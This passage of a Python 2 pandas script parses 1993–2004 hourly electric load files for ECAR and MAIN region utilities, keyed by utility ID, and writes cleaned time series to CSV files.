2001 : pd.read_fwf('%s/ecar/2001/NIPS01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/NIPS02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/NIPS03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/NIPS04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
13998 : {
1993 : pd.read_fwf('%s/ecar/1993/OES93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OES94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OES95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OES96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
14015 : {
1993 : pd.read_fwf('%s/ecar/1993/OVEC93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/OVEC94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/OVEC95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/OVEC96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/OVEC97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/OVEC98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/OVEC99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/OVEC00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/OVEC01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/OVEC02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/OVEC03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/OVEC04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
15470 : {
1993 : pd.read_fwf('%s/ecar/1993/PSI93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/PSI94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/PSI95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
17633 : {
1993 : pd.read_fwf('%s/ecar/1993/SIGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/SIGE94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/SIGE95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/SIGE96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/SIGE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/SIGE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/SIGE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/SIGE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/SIGE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/SIGE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/SIGE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
18997 : {
1993 : pd.read_fwf('%s/ecar/1993/TECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/ecar/1994/TECO94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/ecar/1995/TECO95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/TECO96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
40211 : {
1994 : pd.read_fwf('%s/ecar/1994/WVPA94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2003 : pd.read_fwf('%s/ecar/2003/WVPA03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/WVPA04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
32208 : {
1997 : pd.read_fwf('%s/ecar/1997/FE97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1998 : pd.read_fwf('%s/ecar/1998/FE98' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1999 : pd.read_fwf('%s/ecar/1999/FE99' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/FE00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/FE01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/FE02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/FE03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/FE04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
'mccp' : {
1993 : pd.read_fwf('%s/ecar/1993/MCCP93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/ecar/1996/MCCP96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/ecar/1997/MCCP97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2000 : pd.read_fwf('%s/ecar/2000/MCCP00' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2001 : pd.read_fwf('%s/ecar/2001/MCCP01' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2002 : pd.read_csv('%s/ecar/2002/MCCP02' % (fulldir), header=None)[1].values,
2003 : pd.read_fwf('%s/ecar/2003/MCCP03' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
2004 : pd.read_fwf('%s/ecar/2004/MCCP04' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
}
}
if not os.path.exists('./ecar'):
os.mkdir('ecar')
for k in ecar.keys():
print k
s = pd.DataFrame(pd.concat([pd.Series(ecar[k][i], index=pd.date_range(start=datetime.date(i, 1, 1), freq='h', periods=len(ecar[k][i]))) for i in ecar[k].keys()]).sort_index(), columns=['load'])
s['load'] = s['load'].astype(float).replace(0, np.nan)
s.to_csv('./ecar/%s.csv' % k)
###### MAIN
# CECO : 4110
# CILC: 3252 <- Looks like something is getting cut off from 1993-2000
# CIPS: 3253
# IPC: 9208
# MGE: 11479
# SIPC: 17632
# SPIL: 17828
# UE: 19436
# WEPC: 20847
# WPL: 20856
# WPS: 20860
# UPP: 19578
# WPPI: 20858
# AMER: 19436
# CWL: 4045
main = {
4110 : {
1993 : pd.read_fwf('%s/main/1993/CECO93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=2, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/CECO95' % (fulldir), skiprows=3, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/CECO96' % (fulldir), skiprows=4, header=None)[1].values,
1997 : pd.read_csv('%s/main/1997/CECO97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None)[3].values,
1998 : pd.read_csv('%s/main/1998/CECO98' % (fulldir), sep='\s', skipinitialspace=True, skiprows=5, header=None)[5].values,
1999 : pd.read_csv('%s/main/1999/CECO99' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2000 : pd.read_csv('%s/main/2000/CECO00' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2001 : pd.read_csv('%s/main/2001/CECO01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=5, header=None)[1].values,
2002 : pd.read_csv('%s/main/2002/CECO02' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None)[2].values
},
3252 : {
1993 : pd.read_fwf('%s/main/1993/CILC93' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CILC94' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CILC95' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CILC96' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CILC97' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1998 : pd.read_fwf('%s/main/1998/CILC98' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
1999 : pd.read_fwf('%s/main/1999/CILC99' % (fulldir), header=None).iloc[:, 2:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/CILC00' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CILC01' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2002 : pd.read_excel('%s/main/2002/CILC02' % (fulldir), skiprows=4).loc[:, 'Hour 1':'Hour 24'].values.ravel(),
2003 : pd.read_csv('%s/main/2003/CILC03' % (fulldir), skiprows=1, sep='\t').iloc[:, -1].values
},
3253 : {
1993 : pd.read_fwf('%s/main/1993/CIPS93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/CIPS94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skipfooter=1).iloc[:, 1:].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/CIPS95' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1996 : pd.read_fwf('%s/main/1996/CIPS96' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1997 : pd.read_fwf('%s/main/1997/CIPS97' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel()
},
9208 : {
1993 : pd.read_csv('%s/main/1993/IPC93' % (fulldir), skipfooter=1, header=None)[2].values,
1994 : pd.read_csv('%s/main/1994/IPC94' % (fulldir), skipfooter=1, header=None)[2].values,
1995 : pd.read_csv('%s/main/1995/IPC95' % (fulldir), skipfooter=1, header=None)[4].astype(str).str.replace('.', '0').astype(float).values,
1996 : pd.read_csv('%s/main/1996/IPC96' % (fulldir)).iloc[:, -1].values,
1997 : pd.read_csv('%s/main/1997/IPC97' % (fulldir)).iloc[:, -1].values,
1998 : pd.read_excel('%s/main/1998/IPC98' % (fulldir)).iloc[:, -1].values,
1999 : pd.read_csv('%s/main/1999/IPC99' % (fulldir), skiprows=2, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/IPC00' % (fulldir), skiprows=1).iloc[:, -1].values,
2001 : pd.read_excel('%s/main/2001/IPC01' % (fulldir), skiprows=1).iloc[:, -1].values,
2002 : pd.read_excel('%s/main/2002/IPC02' % (fulldir), skiprows=4).iloc[:, -1].values,
2003 : pd.read_excel('%s/main/2003/IPC03' % (fulldir), skiprows=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/IPC04' % (fulldir), skiprows=1).iloc[:, -1].values
},
11479 : {
1993 : pd.read_fwf('%s/main/1993/MGE93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5], header=None, skiprows=4).iloc[:, 1:].dropna().astype(float).values.ravel(),
1995 : pd.read_csv('%s/main/1995/MGE95' % (fulldir), sep=' ', skipinitialspace=True, header=None)[2].values,
1997 : pd.read_csv('%s/main/1997/MGE97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=12, header=None).iloc[:-1, 2].astype(float).values,
1998 : pd.read_csv('%s/main/1998/MGE98' % (fulldir), sep=' ', skipinitialspace=True).iloc[:-1]['LOAD'].astype(float).values,
1999 : pd.read_csv('%s/main/1999/MGE99' % (fulldir), sep=' ', skiprows=2, header=None, skipinitialspace=True).iloc[:-2, 2].astype(float).values,
2000 : pd.read_csv('%s/main/2000/MGE00' % (fulldir), sep=' ', skiprows=3, header=None, skipinitialspace=True, skipfooter=2).iloc[:, 2].astype(float).values,
2000 : pd.read_fwf('%s/main/2000/MGE00' % (fulldir), skiprows=2)['VMS_DATE'].iloc[:-2].str.split().str[-1].astype(float).values,
2001 : pd.read_fwf('%s/main/2001/MGE01' % (fulldir), skiprows=1, header=None).iloc[:-2, 2].values,
2002 : pd.read_fwf('%s/main/2002/MGE02' % (fulldir), skiprows=4, header=None).iloc[:-1, 0].str.split().str[-1].astype(float).values
},
17632 : {
1994 : pd.read_csv('%s/main/1994/SIPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/SIPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_csv('%s/main/1997/SIPC97' % (fulldir), engine='python', header=None)[0].values,
1998 : pd.read_csv('%s/main/1998/SIPC98' % (fulldir), engine='python', header=None)[0].values,
1999 : pd.read_csv('%s/main/1999/SIPC99' % (fulldir), engine='python', header=None)[0].replace('no data', '0').astype(float).values,
2000 : pd.read_csv('%s/main/2000/SIPC00' % (fulldir), engine='python', header=None)[0].astype(str).str[:3].astype(float).values,
2001 : pd.read_csv('%s/main/2001/SIPC01' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2002 : pd.read_csv('%s/main/2002/SIPC02' % (fulldir), sep='\t', skiprows=3, header=None)[1].values,
2003 : pd.read_csv('%s/main/2003/SIPC03' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values,
2004 : pd.read_csv('%s/main/2004/SIPC04' % (fulldir), engine='python', header=None)[0].str.strip().str[:3].astype(float).values
},
17828 : {
1993 : pd.read_csv('%s/main/1993/SPIL93' % (fulldir), sep=' ', skipinitialspace=True, skiprows=4, header=None).iloc[:, 3:].values.ravel(),
1994 : pd.read_csv('%s/main/1994/SPIL94' % (fulldir), sep=' ', skipinitialspace=True, skiprows=6, header=None).iloc[:, 3:].values.ravel(),
1995 : pd.read_csv('%s/main/1995/SPIL95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/SPIL96' % (fulldir), sep=' ', skipinitialspace=True, skiprows=5, header=None).iloc[:366, 3:].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/SPIL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=7, header=None).iloc[:, 3:].values.ravel(),
1998 : pd.read_csv('%s/main/1998/SPIL98' % (fulldir), sep='\t', skipinitialspace=True, skiprows=8, header=None).iloc[:, 4:].values.ravel(),
1999 : pd.read_csv('%s/main/1999/SPIL99' % (fulldir), skiprows=4, header=None)[0].values,
2000 : pd.read_csv('%s/main/2000/SPIL00' % (fulldir), skiprows=4, header=None)[0].values,
2001 : pd.read_csv('%s/main/2001/SPIL01' % (fulldir), sep='\t', skipinitialspace=True, skiprows=7, header=None).iloc[:, 5:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/SPIL02' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2003 : pd.read_excel('%s/main/2003/SPIL03' % (fulldir), sheetname=2, skiprows=5).iloc[:, 3:].values.ravel(),
2004 : pd.read_excel('%s/main/2004/SPIL04' % (fulldir), sheetname=0, skiprows=5).iloc[:, 3:].values.ravel()
},
19436 : {
1995 : pd.read_fwf('%s/main/1995/UE95' % (fulldir), header=None)[2].values,
1996 : pd.read_fwf('%s/main/1996/UE96' % (fulldir), header=None)[2].values,
1997 : pd.read_fwf('%s/main/1997/UE97' % (fulldir), header=None)[2].values
},
20847 : {
1993 : pd.read_csv('%s/main/1993/WEPC93' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1994 : pd.read_csv('%s/main/1994/WEPC94' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1995 : pd.read_csv('%s/main/1995/WEPC95' % (fulldir), engine='python', skipfooter=1, header=None)[0].values,
1996 : pd.read_csv('%s/main/1996/WEPC96' % (fulldir), engine='python', header=None)[0].values,
1997 : pd.read_excel('%s/main/1997/WEPC97' % (fulldir), header=None)[0].astype(str).str.strip().replace('NA', '0').astype(float).values,
1998 : pd.read_csv('%s/main/1998/WEPC98' % (fulldir), engine='python', header=None)[0].str.strip().replace('NA', 0).astype(float).values,
1999 : pd.read_excel('%s/main/1999/WEPC99' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
2000 : pd.read_excel('%s/main/2000/WEPC00' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WEPC01' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2002 : pd.read_excel('%s/main/2002/WEPC02' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2003 : pd.read_excel('%s/main/2003/WEPC03' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel(),
2004 : pd.read_excel('%s/main/2004/WEPC04' % (fulldir), header=None).iloc[:, 1:].replace('.', '0').astype(float).values.ravel()
},
20856 : {
1993 : pd.read_fwf('%s/main/1993/WPL93' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1994 : pd.read_fwf('%s/main/1994/WPL94' % (fulldir), widths=[20,5,5,5,5,5,5,5,5,5,5,5,5,20,5,5,5,5,5,5,5,5,5,5,5,5], header=None).iloc[:, range(1,13)+range(14,26)].values.ravel(),
1995 : pd.read_fwf('%s/main/1995/WPL95' % (fulldir), header=None).iloc[:, 1:].values.ravel(),
1996 : pd.read_csv('%s/main/1996/WPL96' % (fulldir), header=None, sep='\t').iloc[:, 1:].values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPL97' % (fulldir), sep=' ', skipinitialspace=True, skiprows=1, header=None)[2].str.replace(',', '').astype(float).values
},
20860 : {
1993 : pd.read_csv('%s/main/1993/WPS93' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).values.ravel(),
1994 : (pd.read_csv('%s/main/1994/WPS94' % (fulldir), sep=' ', header=None, skipinitialspace=True, skipfooter=1).iloc[:, 1:-1]/100).values.ravel(),
1995 : pd.read_csv('%s/main/1995/WPS95' % (fulldir), sep=' ', skipinitialspace=True, skiprows=8, header=None, skipfooter=7)[2].values,
1996 : pd.read_csv('%s/main/1996/WPS96' % (fulldir), sep='\t', skiprows=2).loc[:365, '100':'2400'].astype(float).values.ravel(),
1997 : pd.read_csv('%s/main/1997/WPS97' % (fulldir), sep='\s', header=None, skipfooter=1)[2].values,
1998 : pd.read_csv('%s/main/1998/WPS98' % (fulldir), sep='\s', header=None)[2].values,
1999 : pd.read_excel('%s/main/1999/WPS99' % (fulldir), skiprows=8, skipfooter=8, header=None)[1].values,
2000 : pd.read_excel('%s/main/2000/WPS00' % (fulldir), sheetname=1, skiprows=5, skipfooter=8, header=None)[2].values,
2001 : pd.read_excel('%s/main/2001/WPS01' % (fulldir), sheetname=0, skiprows=5, header=None)[2].values,
2002 : pd.read_csv('%s/main/2002/WPS02' % (fulldir), sep='\s', header=None, skiprows=5)[2].values,
2003 : pd.read_excel('%s/main/2003/WPS03' % (fulldir), sheetname=1, skiprows=6, header=None)[2].values
},
19578 : {
1996 : pd.read_csv('%s/main/1996/UPP96' % (fulldir), header=None, skipfooter=1).iloc[:, -1].values,
2004 : pd.read_excel('%s/main/2004/UPP04' % (fulldir)).iloc[:, -1].values
},
20858 : {
1997 : pd.read_csv('%s/main/1997/WPPI97' % (fulldir), skiprows=5, sep=' ', skipinitialspace=True, header=None).iloc[:, 1:-1].values.ravel(),
1999 : pd.DataFrame([i.split() for i in open('%s/main/1999/WPPI99' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2000 : pd.DataFrame([i.split() for i in open('%s/main/2000/WPPI00' % (fulldir)).readlines()[5:]]).iloc[:, 1:-1].astype(float).values.ravel(),
2001 : pd.read_excel('%s/main/2001/WPPI01' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel(),
2002 : pd.read_excel('%s/main/2002/WPPI02' % (fulldir), sheetname=1, skiprows=4).iloc[:, 1:-1].values.ravel()
},
19436 : {
1998 : pd.read_csv('%s/main/1998/AMER98' % (fulldir), sep='\t').iloc[:, -1].str.strip().replace('na', 0).astype(float).values,
1999 : pd.read_csv('%s/main/1999/AMER99' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2000 : pd.read_csv('%s/main/2000/AMER00' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2001 : pd.read_csv('%s/main/2001/AMER01' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('n/a', 0).astype(float).values,
2002 : pd.read_csv('%s/main/2002/AMER02' % (fulldir), sep='\t').iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2003 : pd.read_csv('%s/main/2003/AMER03' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values,
2004 : pd.read_csv('%s/main/2004/AMER04' % (fulldir), sep='\t', skiprows=1).iloc[:, -1].astype(str).str.strip().replace('na', 0).astype(float).values
},
4045 : {
2000 : pd.read_excel('%s/main/2000/CWL00' % (fulldir), skiprows=2).iloc[:, 1:].values.ravel(),
2001 : pd.read_excel('%s/main/2001/CWL01' % (fulldir), skiprows=1).iloc[:, 0].values,
2002 : pd.read_excel('%s/main/2002/CWL02' % (fulldir), header=None).iloc[:, 0].values,
2003 : pd.read_excel('%s/main/2003/CWL03' % (fulldir), header=None).iloc[:, 0].values
}
}
main[20847][1994][main[20847][1994] > 9000] = 0
main[20847][1995][main[20847][1995] > 9000] = 0
main[20847][1996][main[20847][1996] > 9000] = 0
if not os.path.exists('./main'):
os.mkdir('main')
for k in main.keys():
print k
